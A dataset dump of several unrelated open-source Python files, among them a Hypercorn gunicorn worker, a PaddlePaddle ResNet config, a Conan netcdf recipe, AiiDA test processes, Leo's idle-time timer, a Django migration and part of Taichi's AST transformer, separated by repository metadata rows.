insecure_sockets.append(sock.sock)
return Sockets(secure_sockets=secure_sockets, insecure_sockets=insecure_sockets, quic_sockets=[])
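# Usage sketch: gunicorn binds the listeners, transfer_sock() re-wraps them,
# and the Config subclass above simply hands them back to hypercorn:
#
#     config = Config()
#     config.sockets = transfer_sock(worker.sockets)  # worker: a gunicorn Worker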
class HypercornAsyncioWorker(Worker):
"""
Borrowed from uvicorn
"""
CONFIG_KWARGS = {"worker_class": "asyncio"}
def __init__(self, *args, **kwargs):
super(HypercornAsyncioWorker, self).__init__(*args, **kwargs)
config_kwargs = {
"access_log_format": self.cfg.access_log_format,
"accesslog": self.cfg.accesslog,
"alpn_protocols": self.cfg.alpn_protocols,
"alt_svc_headers": self.cfg.alt_svc_headers,
"debug": self.cfg.debug,
"loglevel": self.cfg.loglevel.upper(),
"errorlog": self.cfg.errorlog,
"logconfig": self.cfg.logconfig,
"keep_alive_timeout": self.cfg.keepalive,
"graceful_timeout": self.cfg.graceful_timeout,
"group": self.cfg.group,
"dogstatsd_tags": self.cfg.dogstatsd_tags,
"statsd_host": self.cfg.statsd_host,
"statsd_prefix": self.cfg.statsd_prefix,
"umask": self.cfg.umask,
"user": self.cfg.user,
"h11_max_incomplete_size": self.cfg.h11_max_incomplete_size,
"h2_max_concurrent_streams": self.cfg.h2_max_concurrent_streams,
"h2_max_header_list_size": self.cfg.h2_max_header_list_size,
"h2_max_inbound_frame_size": self.cfg.h2_max_inbound_frame_size,
"include_server_header": self.cfg.include_server_header,
"logger_class": self.cfg.logger_class,
"max_app_queue_size": self.cfg.max_app_queue_size,
"pid_path": self.cfg.pid_path,
"root_path": self.cfg.root_path,
"server_names": self.cfg.server_names,
"shutdown_timeout": self.cfg.shutdown_timeout,
"ssl_handshake_timeout": self.cfg.ssl_handshake_timeout,
"startup_timeout": self.cfg.startup_timeout,
"verify_flags": self.cfg.verify_flags,
"verify_mode": self.cfg.verify_mode,
"websocket_max_message_size": self.cfg.websocket_max_message_size,
"websocket_ping_interval": self.cfg.websocket_ping_interval,
}
config_kwargs.update(logconfig_dict=self.cfg.logconfig_dict if self.cfg.logconfig_dict else None)
if self.cfg.is_ssl:
ssl_kwargs = {
"keyfile": self.cfg.ssl_options.get("keyfile"),
"certfile": self.cfg.ssl_options.get("certfile"),
"ca_certs": self.cfg.ssl_options.get("ca_certs"),
}
if self.cfg.ssl_options.get("ciphers") is not None:
ssl_kwargs.update(ciphers=self.cfg.ssl_options.get("ciphers"))
config_kwargs.update(ssl_kwargs)
if self.cfg.settings["backlog"].value:
config_kwargs["backlog"] = self.cfg.settings["backlog"].value
config_kwargs.update(self.CONFIG_KWARGS)
self.config = Config() # todo
for k, v in config_kwargs.items():
if v is not None:
setattr(self.config, k, v)
def init_signals(self):
for s in self.SIGNALS:
signal.signal(s, signal.SIG_DFL)
def run(self):
asgi_app = self.wsgi
self.config.sockets = transfer_sock(self.sockets)
if self.config.worker_class == "trio":
from hypercorn.trio import serve as trio_serve
import trio
async def start():
async with trio.open_nursery() as nursery:
async def wrap(func: Callable[[], Awaitable[Any]]) -> None:
await func()
nursery.cancel_scope.cancel()
nursery.start_soon(wrap, partial(trio_serve, asgi_app, self.config))
await wrap(self.trio_callback_notify)
trio.run(start)
return
if self.config.worker_class == "uvloop":
import uvloop
uvloop.install()
        async def _main():
            # asyncio.wait() needs tasks, not bare coroutines, on Python 3.11+
            await asyncio.wait(
                [asyncio.ensure_future(asyncio_serve(asgi_app, self.config)),
                 asyncio.ensure_future(self.asyncio_callback_notify())],
                return_when=asyncio.FIRST_COMPLETED)
        asyncio.run(_main())
async def asyncio_callback_notify(self):
while True:
self.notify()
await asyncio.sleep(self.timeout)
async def trio_callback_notify(self):
import trio
while True:
self.notify()
await trio.sleep(self.timeout)
class HypercornUvloopWorker(HypercornAsyncioWorker):
CONFIG_KWARGS = {"worker_class": "uvloop"}
class HypercornTrioWorker(HypercornAsyncioWorker):
CONFIG_KWARGS = {"worker_class": "trio"}
| 37.79021
| 105
| 0.626388
|
4a143516a154185859a42455e60a96ec0630b4ea
| 586
|
py
|
Python
|
bin/pargec_gen.py
|
spiccinini/pargec
|
28257bda4209bc5d72eeb536fdd0e0ae1361aaa9
|
[
"MIT"
] | null | null | null |
bin/pargec_gen.py
|
spiccinini/pargec
|
28257bda4209bc5d72eeb536fdd0e0ae1361aaa9
|
[
"MIT"
] | null | null | null |
bin/pargec_gen.py
|
spiccinini/pargec
|
28257bda4209bc5d72eeb536fdd0e0ae1361aaa9
|
[
"MIT"
] | null | null | null |
import argparse
from pargec.c_generator import generate
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('protocol_file', help='path of the proto.py')
parser.add_argument('output_header')
parser.add_argument('output_source')
parser.add_argument('basename', help='name prefix')
parser.add_argument('-p', "--python", help='generate python wrapper')
args = parser.parse_args()
generate(args.protocol_file, args.output_header, args.output_source,
args.python, args.basename)
| 27.904762
| 73
| 0.725256
|
4a14363ff1db48a5072cbb5f5eb3bc9241ffca8f
| 6,291
|
py
|
Python
|
benchmark/paddle/image/resnet.py
|
hero9968/PaddlePaddle-book
|
1ff47b284c565d030b198705d5f18b4bd4ce53e5
|
[
"Apache-2.0"
] | 3
|
2018-04-16T23:35:32.000Z
|
2019-08-12T01:01:07.000Z
|
benchmark/paddle/image/resnet.py
|
hero9968/PaddlePaddle-book
|
1ff47b284c565d030b198705d5f18b4bd4ce53e5
|
[
"Apache-2.0"
] | null | null | null |
benchmark/paddle/image/resnet.py
|
hero9968/PaddlePaddle-book
|
1ff47b284c565d030b198705d5f18b4bd4ce53e5
|
[
"Apache-2.0"
] | 2
|
2020-11-04T08:07:46.000Z
|
2020-11-06T08:33:24.000Z
|
#!/usr/bin/env python
from paddle.trainer_config_helpers import *
height = 224
width = 224
num_class = 1000
batch_size = get_config_arg('batch_size', int, 64)
layer_num = get_config_arg("layer_num", int, 50)
is_infer = get_config_arg("is_infer", bool, False)
args = {
'height': height,
'width': width,
'color': True,
'num_class': num_class,
'is_infer': is_infer
}
define_py_data_sources2(
"train.list" if not is_infer else None,
"test.list" if is_infer else None,
module="provider",
obj="process",
args=args)
settings(
batch_size=batch_size,
learning_rate=0.01 / batch_size,
learning_method=MomentumOptimizer(0.9),
regularization=L2Regularization(0.0005 * batch_size))
#######################Network Configuration #############
def conv_bn_layer(name,
input,
filter_size,
num_filters,
stride,
padding,
channels=None,
active_type=ReluActivation()):
"""
A wrapper for conv layer with batch normalization layers.
Note:
conv layer has no activation.
"""
tmp = img_conv_layer(
name=name + "_conv",
input=input,
filter_size=filter_size,
num_channels=channels,
num_filters=num_filters,
stride=stride,
padding=padding,
act=LinearActivation(),
bias_attr=False)
return batch_norm_layer(
name=name + "_bn",
input=tmp,
act=active_type,
use_global_stats=is_infer)
def bottleneck_block(name, input, num_filters1, num_filters2):
"""
    A wrapper for the bottleneck building block in ResNet.
    The last conv_bn_layer has no activation;
    the addto layer applies a relu activation.
"""
last_name = conv_bn_layer(
name=name + '_branch2a',
input=input,
filter_size=1,
num_filters=num_filters1,
stride=1,
padding=0)
last_name = conv_bn_layer(
name=name + '_branch2b',
input=last_name,
filter_size=3,
num_filters=num_filters1,
stride=1,
padding=1)
last_name = conv_bn_layer(
name=name + '_branch2c',
input=last_name,
filter_size=1,
num_filters=num_filters2,
stride=1,
padding=0,
active_type=LinearActivation())
return addto_layer(
name=name + "_addto", input=[input, last_name], act=ReluActivation())
def mid_projection(name, input, num_filters1, num_filters2, stride=2):
"""
    A wrapper for the middle projection in ResNet.
    Projection shortcuts are used for increasing dimensions,
    and other shortcuts are identity.
branch1: projection shortcuts are used for increasing
dimensions, has no activation.
branch2x: bottleneck building block, shortcuts are identity.
"""
# stride = 2
branch1 = conv_bn_layer(
name=name + '_branch1',
input=input,
filter_size=1,
num_filters=num_filters2,
stride=stride,
padding=0,
active_type=LinearActivation())
last_name = conv_bn_layer(
name=name + '_branch2a',
input=input,
filter_size=1,
num_filters=num_filters1,
stride=stride,
padding=0)
last_name = conv_bn_layer(
name=name + '_branch2b',
input=last_name,
filter_size=3,
num_filters=num_filters1,
stride=1,
padding=1)
last_name = conv_bn_layer(
name=name + '_branch2c',
input=last_name,
filter_size=1,
num_filters=num_filters2,
stride=1,
padding=0,
active_type=LinearActivation())
return addto_layer(
name=name + "_addto", input=[branch1, last_name], act=ReluActivation())
img = data_layer(name='image', size=height * width * 3)
def deep_res_net(res2_num=3, res3_num=4, res4_num=6, res5_num=3):
"""
A wrapper for 50,101,152 layers of ResNet.
res2_num: number of blocks stacked in conv2_x
res3_num: number of blocks stacked in conv3_x
res4_num: number of blocks stacked in conv4_x
res5_num: number of blocks stacked in conv5_x
"""
# For ImageNet
# conv1: 112x112
tmp = conv_bn_layer(
"conv1",
input=img,
filter_size=7,
channels=3,
num_filters=64,
stride=2,
padding=3)
tmp = img_pool_layer(name="pool1", input=tmp, pool_size=3, stride=2)
# conv2_x: 56x56
tmp = mid_projection(
name="res2_1", input=tmp, num_filters1=64, num_filters2=256, stride=1)
    for i in range(2, res2_num + 1):
tmp = bottleneck_block(
name="res2_" + str(i), input=tmp, num_filters1=64, num_filters2=256)
# conv3_x: 28x28
tmp = mid_projection(
name="res3_1", input=tmp, num_filters1=128, num_filters2=512)
    for i in range(2, res3_num + 1):
tmp = bottleneck_block(
name="res3_" + str(i),
input=tmp,
num_filters1=128,
num_filters2=512)
# conv4_x: 14x14
tmp = mid_projection(
name="res4_1", input=tmp, num_filters1=256, num_filters2=1024)
    for i in range(2, res4_num + 1):
tmp = bottleneck_block(
name="res4_" + str(i),
input=tmp,
num_filters1=256,
num_filters2=1024)
# conv5_x: 7x7
tmp = mid_projection(
name="res5_1", input=tmp, num_filters1=512, num_filters2=2048)
    for i in range(2, res5_num + 1):
tmp = bottleneck_block(
name="res5_" + str(i),
input=tmp,
num_filters1=512,
num_filters2=2048)
tmp = img_pool_layer(
name='avgpool',
input=tmp,
pool_size=7,
stride=1,
pool_type=AvgPooling())
return fc_layer(input=tmp, size=num_class, act=SoftmaxActivation())
if layer_num == 50:
resnet = deep_res_net(3, 4, 6, 3)
elif layer_num == 101:
resnet = deep_res_net(3, 4, 23, 3)
elif layer_num == 152:
resnet = deep_res_net(3, 8, 36, 3)
else:
print("Wrong layer number.")
if is_infer:
outputs(resnet)
else:
lbl = data_layer(name="label", size=num_class)
loss = cross_entropy(name='loss', input=resnet, label=lbl)
outputs(loss)
| 27.471616
| 80
| 0.608488
|
4a14367c1e66fae99c3b3f1af568c8cd27275984
| 5,578
|
py
|
Python
|
recipes/netcdf/all/conanfile.py
|
marsven/conan-center-index
|
d8bb4ad617cee02d8664e8341fa32cdf702e4284
|
[
"MIT"
] | null | null | null |
recipes/netcdf/all/conanfile.py
|
marsven/conan-center-index
|
d8bb4ad617cee02d8664e8341fa32cdf702e4284
|
[
"MIT"
] | 1
|
2021-11-22T13:54:48.000Z
|
2021-11-22T14:09:45.000Z
|
recipes/netcdf/all/conanfile.py
|
marsven/conan-center-index
|
d8bb4ad617cee02d8664e8341fa32cdf702e4284
|
[
"MIT"
] | null | null | null |
from conans import CMake, ConanFile, tools
import os
required_conan_version = ">=1.43.0"
class NetcdfConan(ConanFile):
name = "netcdf"
description = (
"The Unidata network Common Data Form (netCDF) is an interface for "
"scientific data access and a freely-distributed software library "
"that provides an implementation of the interface."
)
topics = ("unidata", "unidata-netcdf", "networking")
license = "BSD-3-Clause"
homepage = "https://github.com/Unidata/netcdf-c"
url = "https://github.com/conan-io/conan-center-index"
settings = "os", "arch", "compiler", "build_type"
options = {
"shared": [True, False],
"fPIC": [True, False],
"netcdf4": [True, False],
"with_hdf5": [True, False],
"cdf5": [True, False],
"dap": [True, False],
}
default_options = {
"shared": False,
"fPIC": True,
"netcdf4": True,
"with_hdf5": True,
"cdf5": True,
"dap": True,
}
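    # Consumers can toggle these options on the command line (conan v1 syntax;
    # the reference/version below is hypothetical):
    #   conan install netcdf/4.7.4@ -o netcdf:shared=True -o netcdf:dap=False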
generators = "cmake_find_package", "cmake_find_package_multi", "cmake"
_cmake = None
@property
def _with_hdf5(self):
return self.options.with_hdf5 or self.options.netcdf4
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
def export_sources(self):
self.copy("CMakeLists.txt")
for patch in self.conan_data.get("patches", {}).get(self.version, []):
self.copy(patch["patch_file"])
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def requirements(self):
if self._with_hdf5:
self.requires("hdf5/1.12.0")
if self.options.dap:
self.requires("libcurl/7.80.0")
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
self._cmake.definitions["BUILD_TESTING"] = False
self._cmake.definitions["BUILD_UTILITIES"] = False
self._cmake.definitions["ENABLE_TESTS"] = False
self._cmake.definitions["ENABLE_NETCDF_4"] = self.options.netcdf4
self._cmake.definitions["ENABLE_CDF5"] = self.options.cdf5
self._cmake.definitions["ENABLE_DAP"] = self.options.dap
self._cmake.definitions["USE_HDF5"] = self.options.with_hdf5
self._cmake.definitions["NC_FIND_SHARED_LIBS"] = self.options.with_hdf5 and self.options["hdf5"].shared
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy("COPYRIGHT", src=self._source_subfolder, dst="licenses")
cmake = self._configure_cmake()
cmake.install()
os.unlink(os.path.join(self.package_folder, "bin", "nc-config"))
tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.settings")
tools.rmdir(os.path.join(self.package_folder, "lib", "cmake"))
tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig"))
tools.rmdir(os.path.join(self.package_folder, "share"))
if self.settings.os == "Windows" and self.options.shared:
for vc_file in ["concrt*.dll", "msvcp*.dll", "vcruntime*.dll"]:
tools.remove_files_by_mask(os.path.join(self.package_folder, "bin"), vc_file)
tools.remove_files_by_mask(os.path.join(self.package_folder, "bin"), "*[!.dll]")
else:
tools.rmdir(os.path.join(self.package_folder, "bin"))
def package_info(self):
self.cpp_info.set_property("cmake_file_name", "netCDF")
self.cpp_info.set_property("cmake_target_name", "netCDF::netcdf")
self.cpp_info.set_property("pkg_config_name", "netcdf")
# TODO: back to global scope in conan v2 once cmake_find_package_* generators removed
self.cpp_info.components["libnetcdf"].libs = ["netcdf"]
if self._with_hdf5:
self.cpp_info.components["libnetcdf"].requires.append("hdf5::hdf5")
if self.options.dap:
self.cpp_info.components["libnetcdf"].requires.append("libcurl::libcurl")
if self.settings.os in ["Linux", "FreeBSD"]:
self.cpp_info.components["libnetcdf"].system_libs = ["dl", "m"]
elif self.settings.os == "Windows":
if self.options.shared:
self.cpp_info.components["libnetcdf"].defines.append("DLL_NETCDF")
# TODO: to remove in conan v2 once cmake_find_package_* generators removed
self.cpp_info.names["cmake_find_package"] = "netCDF"
self.cpp_info.names["cmake_find_package_multi"] = "netCDF"
self.cpp_info.components["libnetcdf"].names["cmake_find_package"] = "netcdf"
self.cpp_info.components["libnetcdf"].names["cmake_find_package_multi"] = "netcdf"
self.cpp_info.components["libnetcdf"].set_property("cmake_target_name", "netCDF::netcdf")
self.cpp_info.components["libnetcdf"].set_property("pkg_config_name", "netcdf")
| 39.842857
| 111
| 0.639297
|
4a14379256198dcdef5568f6952aad7a71aae237
| 2,385
|
py
|
Python
|
aiida/backends/tests/utils/processes.py
|
PercivalN/aiida-core
|
b215ed5a7ce9342bb7f671b67e95c1f474cc5940
|
[
"BSD-2-Clause"
] | 1
|
2019-07-31T04:08:13.000Z
|
2019-07-31T04:08:13.000Z
|
aiida/backends/tests/utils/processes.py
|
PercivalN/aiida-core
|
b215ed5a7ce9342bb7f671b67e95c1f474cc5940
|
[
"BSD-2-Clause"
] | null | null | null |
aiida/backends/tests/utils/processes.py
|
PercivalN/aiida-core
|
b215ed5a7ce9342bb7f671b67e95c1f474cc5940
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Utilities for testing components from the workflow engine"""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import plumpy
from aiida.orm import Data, WorkflowNode
from aiida.engine import Process
class DummyProcess(Process):
"""A Process that does nothing when it runs."""
_node_class = WorkflowNode
@classmethod
def define(cls, spec):
super(DummyProcess, cls).define(spec)
spec.inputs.valid_type = Data
spec.outputs.valid_type = Data
def run(self):
pass
class AddProcess(Process):
"""A simple Process that adds two integers."""
_node_class = WorkflowNode
@classmethod
def define(cls, spec):
super(AddProcess, cls).define(spec)
spec.input('a', required=True)
spec.input('b', required=True)
spec.output('result', required=True)
def run(self):
summed = self.inputs.a + self.inputs.b
        self.out('result', summed.store())
class BadOutput(Process):
"""A Process that emits an output that isn't an AiiDA Data type."""
_node_class = WorkflowNode
@classmethod
def define(cls, spec):
super(BadOutput, cls).define(spec)
spec.outputs.valid_type = Data
def run(self):
self.out("bad_output", 5)
class ExceptionProcess(Process):
"""A Process that raises a RuntimeError when run."""
_node_class = WorkflowNode
def run(self): # pylint: disable=no-self-use
raise RuntimeError('CRASH')
class WaitProcess(Process):
"""A Process that waits until it is asked to continue."""
_node_class = WorkflowNode
def run(self):
return plumpy.Wait(self.next_step)
def next_step(self):
pass
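# A minimal sketch of exercising one of these processes (assumes a configured
# AiiDA profile; Int is one storable Data type usable as an input):
#
#     from aiida.orm import Int
#     from aiida.engine import run
#     result = run(AddProcess, a=Int(1), b=Int(2))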
| 27.732558
| 75
| 0.588679
|
4a1437b64c3429ddbce4181cbf6e22dcb14d841d
| 5,199
|
py
|
Python
|
waldur_core/cost_tracking/migrations/0001_squashed_0012_fix_fields_length.py
|
PrintScr/waldur-core
|
db9f46619984d9c1e8b62f1aba89a69369ade08a
|
[
"MIT"
] | null | null | null |
waldur_core/cost_tracking/migrations/0001_squashed_0012_fix_fields_length.py
|
PrintScr/waldur-core
|
db9f46619984d9c1e8b62f1aba89a69369ade08a
|
[
"MIT"
] | null | null | null |
waldur_core/cost_tracking/migrations/0001_squashed_0012_fix_fields_length.py
|
PrintScr/waldur-core
|
db9f46619984d9c1e8b62f1aba89a69369ade08a
|
[
"MIT"
] | 1
|
2018-07-26T15:47:23.000Z
|
2018-07-26T15:47:23.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import waldur_core.core.fields
import django.core.validators
import waldur_core.core.validators
class Migration(migrations.Migration):
replaces = [('cost_tracking', '0001_initial'), ('cost_tracking', '0002_price_list'), ('cost_tracking', '0003_new_price_list_items'), ('cost_tracking', '0004_remove_connection_to_resource'), ('cost_tracking', '0005_expand_item_type_size'), ('cost_tracking', '0006_add_backend_cache_fields_to_pricelist'), ('cost_tracking', '0007_remove_obsolete_billing_fields'), ('cost_tracking', '0008_delete_resourceusage'), ('cost_tracking', '0009_defaultpricelistitem_name'), ('cost_tracking', '0010_applicationtype'), ('cost_tracking', '0011_applicationtype_slug'), ('cost_tracking', '0012_fix_fields_length')]
dependencies = [
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='PriceEstimate',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('uuid', waldur_core.core.fields.UUIDField()),
('object_id', models.PositiveIntegerField()),
('total', models.FloatField(default=0)),
('details', waldur_core.core.fields.JSONField(blank=True)),
('month', models.PositiveSmallIntegerField(validators=[django.core.validators.MaxValueValidator(12), django.core.validators.MinValueValidator(1)])),
('year', models.PositiveSmallIntegerField()),
('is_manually_input', models.BooleanField(default=False)),
('is_visible', models.BooleanField(default=True)),
('content_type', models.ForeignKey(to='contenttypes.ContentType')),
],
options={
'unique_together': set([('content_type', 'object_id', 'month', 'year', 'is_manually_input')]),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='PriceListItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('uuid', waldur_core.core.fields.UUIDField()),
('content_type', models.ForeignKey(to='contenttypes.ContentType')),
('object_id', models.PositiveIntegerField()),
('key', models.CharField(max_length=255)),
('value', models.DecimalField(default=0, verbose_name=b'Hourly rate', max_digits=9, decimal_places=2)),
('units', models.CharField(max_length=255, blank=True)),
('item_type', models.CharField(default=b'flavor', max_length=255, choices=[(b'flavor', b'flavor'), (b'storage', b'storage'), (b'license-application', b'license-application'), (b'license-os', b'license-os'), (b'support', b'support'), (b'network', b'network'), (b'usage', b'usage'), (b'users', b'users')])),
('is_manually_input', models.BooleanField(default=False)),
('resource_content_type', models.ForeignKey(related_name='+', default=None, to='contenttypes.ContentType')),
],
options={
'unique_together': set([('key', 'content_type', 'object_id')]),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DefaultPriceListItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=150, verbose_name='name', validators=[waldur_core.core.validators.validate_name])),
('uuid', waldur_core.core.fields.UUIDField()),
('key', models.CharField(max_length=255)),
('value', models.DecimalField(default=0, verbose_name=b'Hourly rate', max_digits=9, decimal_places=2)),
('units', models.CharField(max_length=255, blank=True)),
('item_type', models.CharField(default=b'flavor', max_length=255, choices=[(b'flavor', b'flavor'), (b'storage', b'storage'), (b'license-application', b'license-application'), (b'license-os', b'license-os'), (b'support', b'support'), (b'network', b'network'), (b'usage', b'usage'), (b'users', b'users')])),
('resource_content_type', models.ForeignKey(default=None, to='contenttypes.ContentType')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ApplicationType',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=150, verbose_name='name', validators=[waldur_core.core.validators.validate_name])),
('slug', models.CharField(unique=True, max_length=150)),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
]
| 59.079545
| 602
| 0.611271
|
4a1437d4be9cf29eaec7052a8a21bb1d7476eb51
| 5,235
|
py
|
Python
|
leo/plugins/qt_idle_time.py
|
thomasbuttler/leo-editor
|
c1bddc31313b7788f0d6583dcb4ab75db73e9a09
|
[
"MIT"
] | 1,550
|
2015-01-14T16:30:37.000Z
|
2022-03-31T08:55:58.000Z
|
leo/plugins/qt_idle_time.py
|
thomasbuttler/leo-editor
|
c1bddc31313b7788f0d6583dcb4ab75db73e9a09
|
[
"MIT"
] | 2,009
|
2015-01-13T16:28:52.000Z
|
2022-03-31T18:21:48.000Z
|
leo/plugins/qt_idle_time.py
|
thomasbuttler/leo-editor
|
c1bddc31313b7788f0d6583dcb4ab75db73e9a09
|
[
"MIT"
] | 200
|
2015-01-05T15:07:41.000Z
|
2022-03-07T17:05:01.000Z
|
# -*- coding: utf-8 -*-
#@+leo-ver=5-thin
#@+node:ekr.20140907103315.18777: * @file ../plugins/qt_idle_time.py
#@@first
"""Leo's Qt idle-time code."""
import time
from leo.core import leoGlobals as g
from leo.core.leoQt import QtCore
#@+others
#@+node:ekr.20141028061518.24: ** class IdleTime
class IdleTime:
"""
A class that executes a handler with a given delay at idle time. The
handler takes a single argument, the IdleTime instance::
def handler(timer):
\"""IdleTime handler. timer is an IdleTime instance.\"""
delta_t = timer.time-timer.starting_time
g.trace(timer.count,timer.c.shortFileName(),'%2.4f' % (delta_t))
if timer.count >= 5:
g.trace('done')
timer.stop()
# Execute handler every 500 msec. at idle time.
timer = g.IdleTime(c,handler,delay=500)
if timer: timer.start()
Timer instances are completely independent::
def handler1(timer):
delta_t = timer.time-timer.starting_time
g.trace('%2s %s %2.4f' % (timer.count,timer.c.shortFileName(),delta_t))
if timer.count >= 5:
g.trace('done')
timer.stop()
def handler2(timer):
delta_t = timer.time-timer.starting_time
g.trace('%2s %s %2.4f' % (timer.count,timer.c.shortFileName(),delta_t))
if timer.count >= 10:
g.trace('done')
timer.stop()
timer1 = g.IdleTime(c,handler1,delay=500)
timer2 = g.IdleTime(c,handler2,delay=1000)
if timer1 and timer2:
timer1.start()
timer2.start()
"""
#@+others
#@+node:ekr.20140825042850.18406: *3* IdleTime.__init__
def __init__(self, handler, delay=500, tag=None):
"""ctor for IdleTime class."""
# For use by handlers...
self.count = 0
# The number of times handler has been called.
self.starting_time = None
# Time that the timer started.
self.time = None
# Time that the handle is called.
self.tag = tag
# An arbitrary string/object for use during debugging.
# For use by the IdleTime class...
self.delay = delay
# The argument to self.timer.start:
# 0 for idle time, otherwise a delay in msec.
self.enabled = False
# True: run the timer continuously.
self.handler = handler
# The user-provided idle-time handler.
self.waiting_for_idle = False
            # True if we have already waited for the minimum delay.
# Create the timer, but do not fire it.
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.at_idle_time)
# Add this instance to the global idle_timers.list.
# This reference prevents this instance from being destroyed.
g.app.idle_timers.append(self)
#@+node:ekr.20140825102404.18525: *3* IdleTime.__repr__
def __repr__(self):
"""IdleTime repr."""
tag = self.tag
if tag:
return f"<IdleTime: {tag if isinstance(tag, str) else repr(tag)}>"
return f"<IdleTime: id: {id(self)}>"
__str__ = __repr__
#@+node:ekr.20140825042850.18407: *3* IdleTime.at_idle_time
def at_idle_time(self):
"""Call self.handler not more than once every self.delay msec."""
if g.app.killed:
self.stop()
elif self.enabled:
if self.waiting_for_idle:
# At idle time: call the handler.
self.call_handler()
# Requeue the timer with the appropriate delay.
# 0 means wait until idle time.
self.waiting_for_idle = not self.waiting_for_idle
if self.timer.isActive():
self.timer.stop()
self.timer.start(0 if self.waiting_for_idle else self.delay)
elif self.timer.isActive():
self.timer.stop()
#@+node:ekr.20140825042850.18408: *3* IdleTime.call_handler
def call_handler(self):
"""Carefully call the handler."""
try:
self.count += 1
self.time = time.time()
self.handler(self)
except Exception:
g.es_exception()
self.stop()
#@+node:ekr.20140825080012.18529: *3* IdleTime.destroy_self
def destroy_self(self):
"""Remove the instance from g.app.idle_timers."""
if not g.app.killed and self in g.app.idle_timers:
g.app.idle_timers.remove(self)
#@+node:ekr.20140825042850.18409: *3* IdleTime.start & stop
def start(self):
"""Start idle-time processing"""
self.enabled = True
if self.starting_time is None:
self.starting_time = time.time()
# Wait at least self.delay msec, then wait for idle time.
self.last_delay = self.delay
self.timer.start(self.delay)
def stop(self):
"""Stop idle-time processing. May be called during shutdown."""
self.enabled = False
if hasattr(self, 'timer') and self.timer.isActive():
self.timer.stop()
#@-others
#@-others
#@@language python
#@@tabwidth -4
#@@pagewidth 70
#@-leo
| 37.12766
| 83
| 0.587966
|
4a1438daad2371b1e6b1c2a571ceec2ea163170d
| 45,224
|
py
|
Python
|
python/taichi/lang/ast/ast_transformer.py
|
mzmzm/taichi
|
39129820a922fdd936728d6feb7944ae208345a5
|
[
"MIT"
] | null | null | null |
python/taichi/lang/ast/ast_transformer.py
|
mzmzm/taichi
|
39129820a922fdd936728d6feb7944ae208345a5
|
[
"MIT"
] | null | null | null |
python/taichi/lang/ast/ast_transformer.py
|
mzmzm/taichi
|
39129820a922fdd936728d6feb7944ae208345a5
|
[
"MIT"
] | null | null | null |
import ast
import collections.abc
import inspect
import os
import warnings
from collections import ChainMap
from sys import version_info
import astor
from taichi._lib import core as _ti_core
from taichi._lib.utils import package_root
from taichi.lang import expr, impl, kernel_arguments, kernel_impl, matrix, mesh
from taichi.lang import ops as ti_ops
from taichi.lang._ndrange import ndrange
from taichi.lang.ast.ast_transformer_utils import Builder, LoopStatus
from taichi.lang.ast.symbol_resolver import ASTResolver
from taichi.lang.exception import TaichiSyntaxError
from taichi.lang.matrix import MatrixType
from taichi.lang.util import is_taichi_class, to_taichi_type
from taichi.types import annotations, primitive_types
from taichi import linalg
if version_info < (3, 9):
from astunparse import unparse
else:
from ast import unparse
class ASTTransformer(Builder):
@staticmethod
def build_Name(ctx, node):
node.ptr = ctx.get_var_by_name(node.id)
return node.ptr
@staticmethod
def build_AnnAssign(ctx, node):
build_stmt(ctx, node.value)
build_stmt(ctx, node.annotation)
is_static_assign = isinstance(
node.value, ast.Call) and node.value.func.ptr is impl.static
node.ptr = ASTTransformer.build_assign_annotated(
ctx, node.target, node.value.ptr, is_static_assign,
node.annotation.ptr)
return node.ptr
@staticmethod
def build_assign_annotated(ctx, target, value, is_static_assign,
annotation):
"""Build an annotated assginment like this: target: annotation = value.
Args:
ctx (ast_builder_utils.BuilderContext): The builder context.
target (ast.Name): A variable name. `target.id` holds the name as
a string.
annotation: A type we hope to assign to the target
value: A node representing the value.
is_static_assign: A boolean value indicating whether this is a static assignment
"""
is_local = isinstance(target, ast.Name)
anno = impl.expr_init(annotation)
if is_static_assign:
raise TaichiSyntaxError(
"Static assign cannot be used on annotated assignment")
if is_local and not ctx.is_var_declared(target.id):
var = ti_ops.cast(value, anno)
var = impl.expr_init(var)
ctx.create_variable(target.id, var)
else:
var = build_stmt(ctx, target)
if var.ptr.get_ret_type() != anno:
raise TaichiSyntaxError(
"Static assign cannot have type overloading")
var.assign(value)
return var
@staticmethod
def build_Assign(ctx, node):
build_stmt(ctx, node.value)
is_static_assign = isinstance(
node.value, ast.Call) and node.value.func.ptr is impl.static
# Keep all generated assign statements and compose single one at last.
# The variable is introduced to support chained assignments.
# Ref https://github.com/taichi-dev/taichi/issues/2659.
for node_target in node.targets:
ASTTransformer.build_assign_unpack(ctx, node_target,
